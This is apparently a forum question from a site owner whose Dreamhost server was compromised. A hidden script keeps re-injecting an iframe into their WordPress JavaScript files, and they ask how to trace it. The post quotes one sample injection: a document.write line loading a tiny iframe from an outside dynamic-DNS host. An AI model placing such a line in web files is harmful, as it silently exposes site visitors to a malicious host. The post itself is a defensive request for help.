Possible Duplicate:
My server’s been hacked EMERGENCY
A server of mine recently suffered a malware attack. I've since cleaned the server up a bit, upgraded a variety of wordpress installs and timthumb files, and removed a lot of old and archived directories. My host (dreamhost) agrees that all the big wide open gaping vulnerabilities are closed.
Now I just need to find the source of the malware. Somewhere on my server, a script is adding an iframe injection to all my javascript files. It happens every few minutes. Here's an example of the injection, though this changes sometimes:
document.write('<iframe src="http://wbjsb.myddns.com/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');
If I remove this, it comes back in about 5 minutes.
Any thoughts on how to hunt down the script that is making these changes? Thanks!